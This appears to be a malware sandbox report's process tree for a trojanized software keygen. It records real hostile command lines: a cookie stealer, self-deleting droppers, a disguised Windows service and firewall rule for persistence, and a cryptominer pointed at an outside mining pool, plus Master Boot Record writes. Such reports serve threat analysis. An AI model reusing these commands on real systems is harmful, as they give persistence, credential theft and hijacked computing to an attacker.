C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4664

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:5032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen.bat" "
2⤵
PID:7968

C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:8028

C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe"
4⤵
PID:3936

C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:8048

C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:8068

C:\Users\Admin\AppData\Roaming\1F61.tmp.exe
"C:\Users\Admin\AppData\Roaming\1F61.tmp.exe"
4⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\1F61.tmp.exe"
5⤵
PID:7920

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:3196

C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe"
4⤵
PID:2204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe" >> NUL
4⤵
PID:4284

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:7348

C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:7308

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-3.exe"
4⤵
PID:6324

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:8096

C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:7340

C:\Users\Admin\AppData\Local\Temp\RarSFX23\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX23\Setup.exe"
4⤵
PID:6404

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:5052

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX23\Setup.exe"
5⤵
PID:8100

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:32

C:\Users\Admin\AppData\Local\Temp\RarSFX23\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX23\md2_2efs.exe"
4⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\RarSFX23\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX23\file.exe"
4⤵
PID:8332

C:\Users\Admin\AppData\Roaming\2160.tmp.exe
"C:\Users\Admin\AppData\Roaming\2160.tmp.exe"
5⤵
PID:7128

C:\Users\Admin\AppData\Roaming\2160.tmp.exe
"C:\Users\Admin\AppData\Roaming\2160.tmp.exe"
6⤵
PID:8972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX23\file.exe"
5⤵
PID:420

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:2444

C:\Users\Admin\AppData\Local\Temp\RarSFX23\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX23\BTRSetp.exe"
4⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\RarSFX34\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX34\installer.exe"
5⤵
PID:8412

C:\ProgramData\5624724.61
"C:\ProgramData\5624724.61"
6⤵
PID:8404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8404 -s 728
7⤵
- Program crash
PID:5412

C:\ProgramData\8351687.91
"C:\ProgramData\8351687.91"
6⤵
PID:9116

C:\ProgramData\1740325.19
"C:\ProgramData\1740325.19"
6⤵
PID:7816

C:\Users\Admin\AppData\Local\Temp\RarSFX23\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX23\gdrrr.exe"
4⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7436

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:8368

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:4452

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen.bat" "
2⤵
PID:7976

C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:6900

C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe"
4⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX27\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:1240

C:\Users\Admin\AppData\Roaming\80AC.tmp.exe
"C:\Users\Admin\AppData\Roaming\80AC.tmp.exe"
4⤵
PID:6584

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\80AC.tmp.exe"
5⤵
PID:4832

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4864

C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe"
4⤵
PID:6364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-2.exe" >> NUL
4⤵
PID:5776

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4960

C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:6896

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-3.exe"
4⤵
PID:6620

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:7588

C:\Users\Admin\AppData\Local\Temp\RarSFX25\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\RarSFX28\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX28\Setup.exe"
4⤵
PID:6688

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:7804

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX28\Setup.exe"
5⤵
PID:7704

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:5580

C:\Users\Admin\AppData\Local\Temp\RarSFX28\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX28\md2_2efs.exe"
4⤵
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 2708
5⤵
- Program crash
PID:5404

C:\Users\Admin\AppData\Local\Temp\RarSFX28\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX28\file.exe"
4⤵
PID:7616

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen.bat" "
2⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
PID:5188

C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"
4⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-4.exe
keygen-step-4.exe
3⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\RarSFX10\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\Setup.exe"
4⤵
PID:4380

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
PID:5760

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX10\Setup.exe"
5⤵
PID:6192

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:6712

C:\Users\Admin\AppData\Local\Temp\RarSFX10\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\md2_2efs.exe"
4⤵
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2716
5⤵
- Program crash
PID:5384

C:\Users\Admin\AppData\Local\Temp\RarSFX10\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\file.exe"
4⤵
PID:7452

C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe
"C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe"
5⤵
PID:8172

C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe
"C:\Users\Admin\AppData\Roaming\3DD6.tmp.exe"
6⤵
PID:6952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX10\file.exe"
5⤵
PID:700

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:6496

C:\Users\Admin\AppData\Local\Temp\RarSFX10\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\BTRSetp.exe"
4⤵
PID:7460

C:\Users\Admin\AppData\Local\Temp\RarSFX29\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX29\installer.exe"
5⤵
PID:1540

C:\ProgramData\6128860.67
"C:\ProgramData\6128860.67"
6⤵
PID:8460

C:\ProgramData\802397.8
"C:\ProgramData\802397.8"
6⤵
PID:8524

C:\ProgramData\3372900.37
"C:\ProgramData\3372900.37"
6⤵
PID:8672

C:\Users\Admin\AppData\Local\Temp\RarSFX10\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\gdrrr.exe"
4⤵
PID:9056

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:8348

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-3.exe
keygen-step-3.exe
3⤵
PID:5236

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-3.exe"
4⤵
PID:5560

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:5144

C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe
keygen-step-2.exe
3⤵
PID:5228

C:\Users\Admin\AppData\Roaming\965B.tmp.exe
"C:\Users\Admin\AppData\Roaming\965B.tmp.exe"
4⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe"
4⤵
PID:5832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-2.exe" >> NUL
4⤵
PID:5900

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:5528

C:\Users\Admin\AppData\Local\Temp\RarSFX9\keygen-step-1.exe
keygen-step-1.exe
3⤵
PID:5220

C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe
"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"
1⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat" "
2⤵
PID:4948

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:3216

C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe"
4⤵
- Executes dropped EXE
PID:5496

C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:5536

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:2436

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4360

C:\Users\Admin\AppData\Roaming\71AD.tmp.exe
"C:\Users\Admin\AppData\Roaming\71AD.tmp.exe"
4⤵
- Executes dropped EXE
PID:5848

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\71AD.tmp.exe"
5⤵
PID:6604

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:6788

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe"
4⤵
- Executes dropped EXE
PID:5876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-2.exe" >> NUL
4⤵
PID:5892

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:6016

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:5164

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe"
4⤵
PID:5628

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:5744

C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:5308

C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
PID:5520

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Suspicious use of FindShellTrayWindow
PID:5976

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe"
5⤵
PID:1256

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:5288

C:\Users\Admin\AppData\Local\Temp\RarSFX8\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\md2_2efs.exe"
4⤵
PID:1244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 2824
5⤵
- Program crash
PID:5616

C:\Users\Admin\AppData\Local\Temp\RarSFX8\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\file.exe"
4⤵
PID:6820

C:\Users\Admin\AppData\Roaming\D41.tmp.exe
"C:\Users\Admin\AppData\Roaming\D41.tmp.exe"
5⤵
PID:7368

C:\Users\Admin\AppData\Roaming\D41.tmp.exe
"C:\Users\Admin\AppData\Roaming\D41.tmp.exe"
6⤵
PID:6732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX8\file.exe"
5⤵
PID:5772

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:8128

C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe"
4⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\RarSFX24\installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX24\installer.exe"
5⤵
PID:7008

C:\ProgramData\7154320.78
"C:\ProgramData\7154320.78"
6⤵
PID:188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 724
7⤵
- Program crash
PID:7248

C:\ProgramData\1857559.20
"C:\ProgramData\1857559.20"
6⤵
PID:8148

C:\ProgramData\2485510.27
"C:\ProgramData\2485510.27"
6⤵
PID:7280

C:\Users\Admin\AppData\Local\Temp\RarSFX8\gdrrr.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX8\gdrrr.exe"
4⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7124

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\d53ec052d9c0438b862b8b449ca3ace2 /t 3108 /p 2624
1⤵
PID:6608

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\3B94.exe
C:\Users\Admin\AppData\Local\Temp\3B94.exe
1⤵
PID:8188

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\8998a070-e5b8-4e62-9734-2e56c0880fb8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:6416

C:\Users\Admin\AppData\Local\Temp\3B94.exe
"C:\Users\Admin\AppData\Local\Temp\3B94.exe" --Admin IsNotAutoStart IsNotTask
2⤵
PID:8108

C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin1.exe
"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin1.exe"
3⤵
PID:8264

C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin2.exe
"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin2.exe"
3⤵
PID:6664

C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin.exe
"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin.exe"
3⤵
PID:6804

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\updatewin.exe
4⤵
PID:8600

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:7672

C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\5.exe
"C:\Users\Admin\AppData\Local\3a65f372-9186-4a3d-bfc1-d29a4c97ebd2\5.exe"
3⤵
PID:9060

C:\Users\Admin\AppData\Local\Temp\4D19.exe
C:\Users\Admin\AppData\Local\Temp\4D19.exe
1⤵
PID:6544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 4D19.exe /f & erase C:\Users\Admin\AppData\Local\Temp\4D19.exe & exit
2⤵
PID:7192

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 4D19.exe /f
3⤵
- Kills process with taskkill
PID:8396

C:\Users\Admin\AppData\Local\Temp\5BFF.exe
C:\Users\Admin\AppData\Local\Temp\5BFF.exe
1⤵
PID:5724

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\04e2dd6159bd403a86ccfcd273aebd71 /t 7092 /p 2104
1⤵
PID:8164

C:\Users\Admin\AppData\Local\Temp\643D.exe
C:\Users\Admin\AppData\Local\Temp\643D.exe
1⤵
PID:7260

C:\Users\Admin\AppData\Local\Temp\6F2B.exe
C:\Users\Admin\AppData\Local\Temp\6F2B.exe
1⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ovmnaapf\
2⤵
PID:4716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wvjlzwxp.exe" C:\Windows\SysWOW64\ovmnaapf\
2⤵
PID:7744

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ovmnaapf binPath= "C:\Windows\SysWOW64\ovmnaapf\wvjlzwxp.exe /d\"C:\Users\Admin\AppData\Local\Temp\6F2B.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:8060

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ovmnaapf "wifi internet conection"
2⤵
PID:8228

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ovmnaapf
2⤵
PID:8892

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:8476

C:\Users\Admin\AppData\Local\Temp\8295.exe
C:\Users\Admin\AppData\Local\Temp\8295.exe
1⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\9090.exe
C:\Users\Admin\AppData\Local\Temp\9090.exe
1⤵
PID:7584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 3852
2⤵
- Program crash
PID:7948

C:\Users\Admin\AppData\Local\Temp\A3BB.exe
C:\Users\Admin\AppData\Local\Temp\A3BB.exe
1⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\A3BB.exe
C:\Users\Admin\AppData\Local\Temp\A3BB.exe
2⤵
PID:7212

C:\Users\Admin\AppData\Local\Temp\B679.exe
C:\Users\Admin\AppData\Local\Temp\B679.exe
1⤵
PID:8308

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:8384

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:9088

C:\Windows\SysWOW64\ovmnaapf\wvjlzwxp.exe
C:\Windows\SysWOW64\ovmnaapf\wvjlzwxp.exe /d"C:\Users\Admin\AppData\Local\Temp\6F2B.exe"
1⤵
PID:9104

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:8832

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
3⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\C426.exe
C:\Users\Admin\AppData\Local\Temp\C426.exe
1⤵
PID:8724

C:\Users\Admin\AppData\Local\Temp\DEC4.exe
C:\Users\Admin\AppData\Local\Temp\DEC4.exe
1⤵
PID:8544

C:\Users\Admin\AppData\Local\Temp\7F6A.exe
C:\Users\Admin\AppData\Local\Temp\7F6A.exe
1⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\7F6A.exe
C:\Users\Admin\AppData\Local\Temp\7F6A.exe
2⤵
PID:5736

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
3⤵
PID:2784

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
4⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\8F59.exe
C:\Users\Admin\AppData\Local\Temp\8F59.exe
1⤵
PID:9176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7420

C:\Users\Admin\AppData\Local\Temp\D82A.exe
C:\Users\Admin\AppData\Local\Temp\D82A.exe
1⤵
PID:8928

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\D82A.exe
2⤵
PID:4652

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Modify Existing Service

